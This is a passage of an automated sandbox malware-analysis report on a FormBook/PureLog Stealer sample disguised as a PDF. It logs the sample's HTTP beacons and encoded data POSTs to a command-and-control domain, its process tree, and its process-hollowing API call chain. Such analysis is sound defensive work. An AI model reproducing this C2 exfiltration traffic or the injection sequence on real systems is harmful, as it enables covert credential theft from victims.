                                                                                      Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 72 41 50 5a 50 4a 4c 4d 31 30 6e 48 74 78 6a 76 51 30 66 47 74 56 31 36 62 50 4e 30 74 39 6a 33 62 47 44 74 59 48 4c 72 4d 71 62 6b 7a 31 34 2b 79 52 6a 69 74 59 7a 34 64 69 69 52 52 38 57 30 73 30 4c 66 6a 63 6e 4c 70 62 2f 32 4c 78 47 38 48 56 75 6c 55 67 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                                      Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_rAPZPJLM10nHtxjvQ0fGtV16bPN0t9j3bGDtYHLrMqbkz14+yRjitYz4diiRR8W0s0LfjcnLpb/2LxG8HVulUg==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                                      Nov 25, 2024 13:58:58.413882017 CET579INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                                                      Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiZTlhNWI3MGItNmE2MC00N2VjLThiZjgtODk1MTdlNjJmMDYzIiwicGFnZV90aW1lIjoxNzMyNTM5NT


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      47192.168.2.849764199.59.243.227806380C:\Program Files (x86)\hLNpsIHmukIZoDRDxpFbCIICufiWlKehcOANmZAhCcJscOCNiHYcXedTEQJmYoLIhxFbKY\EnLuReulIds.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Nov 25, 2024 13:58:59.836966991 CET1804OUTPOST /3agz/ HTTP/1.1
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      Host: www.oztalkshw.store
                                                                                      Origin: http://www.oztalkshw.store
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Content-Length: 1242
                                                                                      Cache-Control: max-age=0
                                                                                      Connection: close
                                                                                      Referer: http://www.oztalkshw.store/3agz/
                                                                                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; HM NOTE 1LTE Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.111 Mobile Safari/537.36
                                                                                      Data Raw: 55 62 52 78 6d 3d 42 2f 69 45 62 61 33 4d 47 35 44 32 65 48 47 31 54 66 55 34 44 76 73 2b 64 6e 4a 4b 59 4b 67 67 64 67 68 37 53 59 45 37 76 42 30 48 73 73 68 68 42 37 54 65 75 6f 2f 37 38 48 4e 68 63 57 39 7a 52 5a 46 42 53 4c 75 7a 41 4d 64 5a 79 44 44 43 6f 69 41 6e 68 2b 76 37 46 6f 73 34 63 35 49 50 39 55 63 77 33 2b 4a 2b 33 39 45 74 67 69 42 65 32 71 56 63 6d 4d 6d 55 70 75 38 2f 64 42 45 31 32 76 49 69 63 2f 36 4d 38 4c 72 4f 75 4c 72 6f 59 34 50 64 48 54 73 6d 4a 62 49 70 31 7a 38 56 51 6c 58 2f 77 46 53 45 33 4c 7a 72 4f 78 63 54 45 61 56 4d 62 47 38 79 43 58 46 4b 39 44 4a 4b 79 59 71 4d 4c 58 35 68 2b 58 4a 54 48 63 48 41 67 62 59 75 34 77 2b 51 4e 30 31 47 7a 74 68 63 63 45 72 69 4f 58 6a 6c 38 30 35 4e 76 7a 44 76 59 79 35 74 6a 4a 74 32 63 57 6b 57 6d 6f 52 32 4b 64 5a 6a 31 70 5a 2b 4d 74 43 52 37 56 58 6f 36 78 33 72 79 58 49 58 44 59 55 59 71 7a 6c 69 61 44 7a 52 72 70 2b 70 32 79 74 67 64 49 35 65 4a 47 49 4a 4e 6d 44 4c 33 56 70 75 31 73 75 51 70 77 75 32 66 79 38 32 61 74 5a 48 [TRUNCATED]
                                                                                      Data Ascii: UbRxm=B/iEba3MG5D2eHG1TfU4Dvs+dnJKYKggdgh7SYE7vB0HsshhB7Teuo/78HNhcW9zRZFBSLuzAMdZyDDCoiAnh+v7Fos4c5IP9Ucw3+J+39EtgiBe2qVcmMmUpu8/dBE12vIic/6M8LrOuLroY4PdHTsmJbIp1z8VQlX/wFSE3LzrOxcTEaVMbG8yCXFK9DJKyYqMLX5h+XJTHcHAgbYu4w+QN01GzthccEriOXjl805NvzDvYy5tjJt2cWkWmoR2KdZj1pZ+MtCR7VXo6x3ryXIXDYUYqzliaDzRrp+p2ytgdI5eJGIJNmDL3Vpu1suQpwu2fy82atZHikwb2ROWnY7rAQLBenlONMzFODP+4vvKT6VCIBukb74amIZ/2BIb1TD0py0+IK6WapRUvaGQkSL3GTxbzvwBHpFem876Az25Z0G3GOY8O1DxOWpC21wRYfIatTdSIsVcCGyZ+4iISVZ/RnFcM9775QRvOuUFkcuKIUe4IcLJR9PmKyomk4lb8tLVRXnXWNkwOuq47hT/95TMjD2Vv1k5HsRUdrXOQOTER0f2/9QftWFzC1KRyP0yvCQwUxg0P3c/AzkqbFQrUhuMbsxduoM/wLT5QCvItbSuztF8NY8Sviv+1y0rbiuznNI1/oYfSa9KPYAW94V9zHZM8z/na+s+FR0t7PmKFrrODDtypnETqmkszzRi3pveoZaNvb2/Ul1/M1wL2w/OfpI/C7SzEQ7tAlKML843TahXXeTMS39/tnc2B/WJ8/WjDOc2z3MuTcSxf6nuZzMI54kCG1IJ+b4hAXxyfk9ltVoB1yct9EcAk4CVWyTAs2VOicdXOm+uA7CLN7J8lr9R/L26bbG+XG02qxYavoEG4C+D+9PCncPT8vsjM/fbrzqYN7xMpx4+/7Kc4eEYLUz+VvuYcIeW/1epMvGMCGd1/6zHgNx67qNJVJZMayEw7k9vvsG05upQkPpe2sintyEvhgd2CPgJr48oEN0UshssVOhDLs [TRUNCATED]
                                                                                      Nov 25, 2024 13:59:00.945743084 CET1236INHTTP/1.1 200 OK
                                                                                      date: Mon, 25 Nov 2024 12:59:00 GMT
                                                                                      content-type: text/html; charset=utf-8
                                                                                      content-length: 1126
                                                                                      x-request-id: d14c45fd-2d7b-434c-8dc6-00ed3850f059
                                                                                      cache-control: no-store, max-age=0
                                                                                      accept-ch: sec-ch-prefers-color-scheme
                                                                                      critical-ch: sec-ch-prefers-color-scheme
                                                                                      vary: sec-ch-prefers-color-scheme
                                                                                      x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_rAPZPJLM10nHtxjvQ0fGtV16bPN0t9j3bGDtYHLrMqbkz14+yRjitYz4diiRR8W0s0LfjcnLpb/2LxG8HVulUg==
                                                                                      set-cookie: parking_session=d14c45fd-2d7b-434c-8dc6-00ed3850f059; expires=Mon, 25 Nov 2024 13:14:00 GMT; path=/
                                                                                      connection: close
                                                                                      Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 72 41 50 5a 50 4a 4c 4d 31 30 6e 48 74 78 6a 76 51 30 66 47 74 56 31 36 62 50 4e 30 74 39 6a 33 62 47 44 74 59 48 4c 72 4d 71 62 6b 7a 31 34 2b 79 52 6a 69 74 59 7a 34 64 69 69 52 52 38 57 30 73 30 4c 66 6a 63 6e 4c 70 62 2f 32 4c 78 47 38 48 56 75 6c 55 67 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                                      Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_rAPZPJLM10nHtxjvQ0fGtV16bPN0t9j3bGDtYHLrMqbkz14+yRjitYz4diiRR8W0s0LfjcnLpb/2LxG8HVulUg==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                                      Nov 25, 2024 13:59:00.945884943 CET579INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                                                      Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiZDE0YzQ1ZmQtMmQ3Yi00MzRjLThkYzYtMDBlZDM4NTBmMDU5IiwicGFnZV90aW1lIjoxNzMyNTM5NT


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      48192.168.2.849765199.59.243.227806380C:\Program Files (x86)\hLNpsIHmukIZoDRDxpFbCIICufiWlKehcOANmZAhCcJscOCNiHYcXedTEQJmYoLIhxFbKY\EnLuReulIds.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Nov 25, 2024 13:59:02.500936985 CET513OUTGET /3agz/?YvA4=xnL8AvI8CJiPEDU&UbRxm=M9KkYvXJQvTAdDL0N809Af0gFgx9ZbNQHhlIdroNnVkJjfd2I5bhi/bs41o8FjJgMZ4GFKyENsY1nw3d8RcMg+XWHrwZPIIO2wtMzeZ/v8QmuglPj4pAgM6ngctNURE5tA== HTTP/1.1
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      Host: www.oztalkshw.store
                                                                                      Connection: close
                                                                                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; HM NOTE 1LTE Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.111 Mobile Safari/537.36
                                                                                      Nov 25, 2024 13:59:03.636507988 CET1236INHTTP/1.1 200 OK
                                                                                      date: Mon, 25 Nov 2024 12:59:03 GMT
                                                                                      content-type: text/html; charset=utf-8
                                                                                      content-length: 1514
                                                                                      x-request-id: a0f4e7ad-6205-43b8-bc66-b0f65670461b
                                                                                      cache-control: no-store, max-age=0
                                                                                      accept-ch: sec-ch-prefers-color-scheme
                                                                                      critical-ch: sec-ch-prefers-color-scheme
                                                                                      vary: sec-ch-prefers-color-scheme
                                                                                      x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_rAV1XxGUJnJ9F7V0zrTN1wZ37258VFA5uKMiQUXFR4asXq9rIuF4X06+idGP8fdTz5LaqqR0ho3fY3ddUYMGCw==
                                                                                      set-cookie: parking_session=a0f4e7ad-6205-43b8-bc66-b0f65670461b; expires=Mon, 25 Nov 2024 13:14:03 GMT; path=/
                                                                                      connection: close
                                                                                      Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 72 41 56 31 58 78 47 55 4a 6e 4a 39 46 37 56 30 7a 72 54 4e 31 77 5a 33 37 32 35 38 56 46 41 35 75 4b 4d 69 51 55 58 46 52 34 61 73 58 71 39 72 49 75 46 34 58 30 36 2b 69 64 47 50 38 66 64 54 7a 35 4c 61 71 71 52 30 68 6f 33 66 59 33 64 64 55 59 4d 47 43 77 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                                      Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_rAV1XxGUJnJ9F7V0zrTN1wZ37258VFA5uKMiQUXFR4asXq9rIuF4X06+idGP8fdTz5LaqqR0ho3fY3ddUYMGCw==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                                      Nov 25, 2024 13:59:03.636657000 CET967INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                                                      Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiYTBmNGU3YWQtNjIwNS00M2I4LWJjNjYtYjBmNjU2NzA0NjFiIiwicGFnZV90aW1lIjoxNzMyNTM5NT


                                                                                      Statistics

                                                                                      CPU Usage

                                                                                      Click to jump to process

                                                                                      Memory Usage

                                                                                      Click to jump to process

                                                                                      High Level Behavior Distribution

                                                                                      Click to dive into process behavior distribution

                                                                                      Behavior

                                                                                      Click to jump to process

                                                                                      System Behavior

                                                                                      General

                                                                                      Target ID:0
                                                                                      Start time:07:54:58
                                                                                      Start date:25/11/2024
                                                                                      Path:C:\Users\user\Desktop\DO-COSU6387686280.pdf.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"C:\Users\user\Desktop\DO-COSU6387686280.pdf.exe"
                                                                                      Imagebase:0x8b0000
                                                                                      File size:779'776 bytes
                                                                                      MD5 hash:AD0DA4A07F4866D67B266C8686F76081
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1444908234.0000000005E30000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1433265991.0000000003D59000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:3
                                                                                      Start time:07:54:59
                                                                                      Start date:25/11/2024
                                                                                      Path:C:\Users\user\Desktop\DO-COSU6387686280.pdf.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"C:\Users\user\Desktop\DO-COSU6387686280.pdf.exe"
                                                                                      Imagebase:0xc60000
                                                                                      File size:779'776 bytes
                                                                                      MD5 hash:AD0DA4A07F4866D67B266C8686F76081
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.1767827302.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.1770238639.0000000001400000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.1772985722.0000000001D40000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:5
                                                                                      Start time:07:55:25
                                                                                      Start date:25/11/2024
                                                                                      Path:C:\Program Files (x86)\hLNpsIHmukIZoDRDxpFbCIICufiWlKehcOANmZAhCcJscOCNiHYcXedTEQJmYoLIhxFbKY\EnLuReulIds.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"C:\Program Files (x86)\hLNpsIHmukIZoDRDxpFbCIICufiWlKehcOANmZAhCcJscOCNiHYcXedTEQJmYoLIhxFbKY\EnLuReulIds.exe"
                                                                                      Imagebase:0x730000
                                                                                      File size:140'800 bytes
                                                                                      MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.3913539434.0000000003190000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                      Reputation:high
                                                                                      Has exited:false

                                                                                      General

                                                                                      Target ID:6
                                                                                      Start time:07:55:26
                                                                                      Start date:25/11/2024
                                                                                      Path:C:\Windows\SysWOW64\mountvol.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"C:\Windows\SysWOW64\mountvol.exe"
                                                                                      Imagebase:0x190000
                                                                                      File size:15'360 bytes
                                                                                      MD5 hash:E0B3FFF7584298E77DFFB50796839FED
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3913848871.0000000003010000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3902764512.0000000002A20000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3913780105.0000000002FC0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                      Reputation:moderate
                                                                                      Has exited:false

                                                                                      General

                                                                                      Target ID:7
                                                                                      Start time:07:55:40
                                                                                      Start date:25/11/2024
                                                                                      Path:C:\Program Files (x86)\hLNpsIHmukIZoDRDxpFbCIICufiWlKehcOANmZAhCcJscOCNiHYcXedTEQJmYoLIhxFbKY\EnLuReulIds.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"C:\Program Files (x86)\hLNpsIHmukIZoDRDxpFbCIICufiWlKehcOANmZAhCcJscOCNiHYcXedTEQJmYoLIhxFbKY\EnLuReulIds.exe"
                                                                                      Imagebase:0x730000
                                                                                      File size:140'800 bytes
                                                                                      MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.3916754998.0000000005090000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                      Reputation:high
                                                                                      Has exited:false

                                                                                      General

                                                                                      Target ID:11
                                                                                      Start time:07:55:52
                                                                                      Start date:25/11/2024
                                                                                      Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                                      Imagebase:0x7ff6d20e0000
                                                                                      File size:676'768 bytes
                                                                                      MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high
                                                                                      Has exited:true

                                                                                      Disassembly

                                                                                      Reset < >

                                                                                        Execution Graph

                                                                                        Execution Coverage:10.6%
                                                                                        Dynamic/Decrypted Code Coverage:100%
                                                                                        Signature Coverage:0%
                                                                                        Total number of Nodes:170
                                                                                        Total number of Limit Nodes:8
                                                                                        execution_graph 26741 7490358 26742 7490380 26741->26742 26743 7490376 26741->26743 26745 74903ab 26743->26745 26746 74903be 26745->26746 26747 74903e9 26745->26747 26746->26747 26750 7490538 CloseHandle 26746->26750 26752 7490532 26746->26752 26747->26742 26751 7490592 26750->26751 26751->26747 26753 7490538 CloseHandle 26752->26753 26754 7490592 26753->26754 26754->26747 26792 5e7c244 26796 5e7cb80 26792->26796 26800 5e7cb70 26792->26800 26793 5e7c269 26797 5e7cb95 26796->26797 26804 5e7cbb0 26797->26804 26801 5e7cb95 26800->26801 26803 5e7cbb0 12 API calls 26801->26803 26802 5e7cba7 26802->26793 26803->26802 26805 5e7cbda 26804->26805 26820 5e7d2b3 26805->26820 26828 5e7d155 26805->26828 26833 5e7cf77 26805->26833 26838 5e7d049 26805->26838 26843 5e7d08a 26805->26843 26851 5e7d06d 26805->26851 26856 5e7d361 26805->26856 26860 5e7d222 26805->26860 26865 5e7d704 26805->26865 26870 5e7d107 26805->26870 26878 5e7d17a 26805->26878 26883 5e7d5f0 26805->26883 26888 5e7cff3 26805->26888 26806 5e7cba7 26806->26793 26821 5e7d51b 26820->26821 26823 5e7d0e7 26820->26823 26900 5e7b660 26821->26900 26904 5e7b659 26821->26904 26822 5e7d055 26822->26823 26892 5e7b720 26822->26892 26896 5e7b719 26822->26896 26823->26806 26830 5e7d119 26828->26830 26829 5e7d49e 26829->26806 26830->26829 26831 5e7b720 WriteProcessMemory 26830->26831 26832 5e7b719 WriteProcessMemory 26830->26832 26831->26830 26832->26830 26834 5e7cf96 26833->26834 26835 5e7d02a 26834->26835 26908 5e7bdd4 26834->26908 26912 5e7bde0 26834->26912 26839 5e7d055 26838->26839 26840 5e7d0e7 26839->26840 26841 5e7b720 WriteProcessMemory 26839->26841 26842 5e7b719 WriteProcessMemory 26839->26842 26840->26806 26841->26840 26842->26840 26844 5e7d097 26843->26844 26845 5e7d055 26844->26845 26849 5e7b720 WriteProcessMemory 26844->26849 26850 5e7b719 WriteProcessMemory 26844->26850 26846 5e7d0e7 26845->26846 26847 5e7b720 WriteProcessMemory 26845->26847 26848 5e7b719 WriteProcessMemory 26845->26848 26846->26806 26847->26846 26848->26846 26849->26845 26850->26845 26852 5e7d07a 26851->26852 26916 5e7b0a0 26852->26916 26920 5e7b098 26852->26920 26853 5e7d9e4 26925 5e7dc08 26856->26925 26930 5e7dc18 26856->26930 26857 5e7d379 26861 5e7d226 26860->26861 26943 5e7bc48 26861->26943 26947 5e7bc40 26861->26947 26862 5e7d1af 26862->26806 26867 5e7d055 26865->26867 26866 5e7d0e7 26866->26806 26867->26866 26868 5e7b720 WriteProcessMemory 26867->26868 26869 5e7b719 WriteProcessMemory 26867->26869 26868->26866 26869->26866 26871 5e7d457 26870->26871 26876 5e7b150 Wow64SetThreadContext 26871->26876 26877 5e7b148 Wow64SetThreadContext 26871->26877 26872 5e7d472 26874 5e7b0a0 ResumeThread 26872->26874 26875 5e7b098 ResumeThread 26872->26875 26873 5e7d9e4 26874->26873 26875->26873 26876->26872 26877->26872 26879 5e7d226 26878->26879 26881 5e7bc40 ReadProcessMemory 26879->26881 26882 5e7bc48 ReadProcessMemory 26879->26882 26880 5e7d1af 26880->26806 26881->26880 26882->26880 26884 5e7d055 26883->26884 26885 5e7d0e7 26884->26885 26886 5e7b720 WriteProcessMemory 26884->26886 26887 5e7b719 WriteProcessMemory 26884->26887 26885->26806 26886->26885 26887->26885 26890 5e7bdd4 CreateProcessA 26888->26890 26891 5e7bde0 CreateProcessA 26888->26891 26889 5e7d02a 26890->26889 26891->26889 26893 5e7b768 WriteProcessMemory 26892->26893 26895 5e7b7bf 26893->26895 26895->26823 26897 5e7b768 WriteProcessMemory 26896->26897 26899 5e7b7bf 26897->26899 26899->26823 26901 5e7b6a0 VirtualAllocEx 26900->26901 26903 5e7b6dd 26901->26903 26903->26822 26905 5e7b6a0 VirtualAllocEx 26904->26905 26907 5e7b6dd 26905->26907 26907->26822 26909 5e7be69 CreateProcessA 26908->26909 26911 5e7c02b 26909->26911 26913 5e7be69 CreateProcessA 26912->26913 26915 5e7c02b 26913->26915 26917 5e7b0e0 ResumeThread 26916->26917 26919 5e7b111 26917->26919 26919->26853 26921 5e7b022 26920->26921 26922 5e7b09e ResumeThread 26920->26922 26921->26853 26924 5e7b111 26922->26924 26924->26853 26926 5e7dc2d 26925->26926 26935 5e7b150 26926->26935 26939 5e7b148 26926->26939 26927 5e7dc43 26927->26857 26931 5e7dc2d 26930->26931 26933 5e7b150 Wow64SetThreadContext 26931->26933 26934 5e7b148 Wow64SetThreadContext 26931->26934 26932 5e7dc43 26932->26857 26933->26932 26934->26932 26936 5e7b195 Wow64SetThreadContext 26935->26936 26938 5e7b1dd 26936->26938 26938->26927 26940 5e7b195 Wow64SetThreadContext 26939->26940 26942 5e7b1dd 26940->26942 26942->26927 26944 5e7bc93 ReadProcessMemory 26943->26944 26946 5e7bcd7 26944->26946 26946->26862 26948 5e7bc93 ReadProcessMemory 26947->26948 26950 5e7bcd7 26948->26950 26950->26862 26755 13e4668 26756 13e4672 26755->26756 26758 13e4758 26755->26758 26759 13e477d 26758->26759 26763 13e4868 26759->26763 26767 13e4858 26759->26767 26764 13e488f 26763->26764 26766 13e496c 26764->26766 26771 13e44b0 26764->26771 26768 13e4868 26767->26768 26769 13e44b0 CreateActCtxA 26768->26769 26770 13e496c 26768->26770 26769->26770 26772 13e58f8 CreateActCtxA 26771->26772 26774 13e59bb 26772->26774 26775 5e7dd70 26776 5e7defb 26775->26776 26777 5e7dd96 26775->26777 26777->26776 26779 5e7a150 26777->26779 26780 5e7dff0 PostMessageW 26779->26780 26781 5e7e05c 26780->26781 26781->26777 26739 13ed5f0 